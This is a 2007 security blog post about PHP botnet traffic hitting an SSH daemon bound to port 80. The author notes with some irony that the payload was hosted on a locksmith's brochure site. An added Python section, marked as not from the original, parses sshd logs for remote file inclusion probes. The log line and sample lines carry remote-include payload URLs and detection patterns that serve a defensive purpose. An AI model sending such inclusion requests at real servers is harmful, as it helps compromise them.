

Bot Traffic Irony

(Screenshot) "Put your trust in us"

That is a direct quote from a website hosting malicious PHP payloads. This is a real story of irony. I laughed; I cried. Here we go.

Enter a publicly facing Unix system.
For whatever reason, it has SSH bound to a ton of ports, including 80 and 443.
The sysadmin reviews the logs daily.
What have we got today?
Look, it's more PHP botnet traffic hitting port 80.
Silly bot, that's SSH bound to port 80.

Let's take a look at a log snippet:

Apr 4 00:00:00 serverName sshd[93113]: Bad protocol version identification 'GET /PNC/modules/vWar_Account/includes/functions_common.php?vwar_root2= http://www.foo.com/safe' from x.x.x.x

Nothing to see here, move along, move along.
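The log line above is worth more than a laugh: sshd, bound to port 80, recorded the bot's entire HTTP request line as a "Bad protocol version identification" banner, and that request carries the signature of a PHP remote file inclusion probe (a query parameter set to an http:// URL pointing at a hosted PHP payload). The following is an added example, not code from the original post, that pulls such attempts out of an sshd log, recovers the request target even when the bot puts a space before the URL as in the post's entry, and tallies which hosts are serving the payloads. It assumes OpenSSH's standard message format (`Bad protocol version identification '<banner>' from <addr>`, optionally followed by `port N` on newer releases); the sample log is constructed here, with the first line copying the shape of the post's entry and the rest using RFC 5737 documentation addresses.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl, urlsplit

# Constructed sample log (not from any real system): the first line mirrors the
# entry quoted in the post; the others are made-up controls.
SAMPLE_LOG = """\
Apr  4 00:00:00 serverName sshd[93113]: Bad protocol version identification 'GET /PNC/modules/vWar_Account/includes/functions_common.php?vwar_root2= http://www.foo.com/safe' from x.x.x.x
Apr  4 00:01:13 serverName sshd[93120]: Bad protocol version identification 'GET /index.php?page=http://198.51.100.7/x.txt? HTTP/1.1' from 203.0.113.9 port 40112
Apr  4 00:02:41 serverName sshd[93131]: Bad protocol version identification 'GET / HTTP/1.0' from 203.0.113.10
Apr  4 00:03:05 serverName sshd[93140]: Accepted publickey for admin from 192.0.2.5 port 51234 ssh2
"""

# sshd logs the first line a client sent when it is not an SSH version banner;
# newer OpenSSH releases append " port N" after the source address (assumed format).
BAD_VERSION = re.compile(
    r"sshd\[(?P<pid>\d+)\]: Bad protocol version identification "
    r"'(?P<banner>.*)' from (?P<src>\S+)(?: port \d+)?\s*$"
)
HTTP_METHODS = {"GET", "POST", "HEAD"}
REMOTE_URL = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)


def request_target(banner):
    """Rebuild the request target from an HTTP request line.

    Returns None when the banner is not an HTTP request. Tokens after the
    method are joined (minus the HTTP/x.y version) instead of taking only the
    second token, because the bot in the post put a literal space between
    'vwar_root2=' and the URL.
    """
    tokens = banner.split()
    if len(tokens) < 2 or tokens[0] not in HTTP_METHODS:
        return None
    return "".join(t for t in tokens[1:] if not t.startswith("HTTP/"))


def find_rfi_attempts(log_text):
    """Return one dict per 'Bad protocol version' line whose banner is an HTTP
    request with a query parameter pointing at a remote URL."""
    hits = []
    for line in log_text.splitlines():
        m = BAD_VERSION.search(line)
        if not m:
            continue
        target = request_target(m.group("banner"))
        if target is None or "?" not in target:
            continue
        path, query = target.split("?", 1)
        for param, value in parse_qsl(query, keep_blank_values=True):
            if not REMOTE_URL.match(value):
                continue
            # A trailing '?' or '&' is the usual trick to turn whatever the
            # vulnerable include() appends into a harmless query string.
            payload = value.rstrip("?&")
            hits.append({
                "src": m.group("src"),
                "pid": int(m.group("pid")),
                "path": path,
                "param": param,
                "payload_url": payload,
                "payload_host": urlsplit(payload).hostname,
            })
    return hits


def payload_hosts(log_text):
    """Count the hosts serving payloads, i.e. where to look next."""
    return Counter(h["payload_host"] for h in find_rfi_attempts(log_text))


if __name__ == "__main__":
    for hit in find_rfi_attempts(SAMPLE_LOG):
        print(f"{hit['src']} -> {hit['path']} ?{hit['param']}= {hit['payload_url']}")
    print(payload_hosts(SAMPLE_LOG))
```

Run it against `/var/log/auth.log` (or wherever sshd logs on the box) instead of `SAMPLE_LOG` and the output is the list of payload hosts worth a look, which is exactly the step that led the sysadmin in the story to the locksmith's brochure site.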
Just for fun, the sysadmin points his browser to www.foo.com/safe.
Nothing new here either, it's a standard PHP system() call.
For even more fun, let's see what else is hosted at www.foo.com.
It's a brochure website for a locksmith.
Their marketing tagline:

ALLOW US TO TAKE AWAY YOUR SECURITY PROBLEMS.

PUT YOUR TRUST IN US.

YOU WON'T BE DISAPPOINTED.

Maybe they specialize in bump keys?

(The picture is a screenshot snippet from the website. Real identities are masked to protect the poor locksmith, who probably has no idea what I'm talking about.)


Bio

Blog: Sync
Author: Andrew Storms

As nCircle's Director of Security Operations, Andrew Storms is responsible for setting and enforcing the company's security compliance programs as well as overseeing day-to-day operations for the Information Technology department. He is a Certified Information Systems Security Professional (CISSP).

About

This page contains a single entry from the blog posted on April 5, 2007 10:49 AM.

The previous post in this blog was Patch, upgrade, hotfix -- its all risk.

The next post in this blog is Blogger's Code of Conduct Won't Fix the Problem.
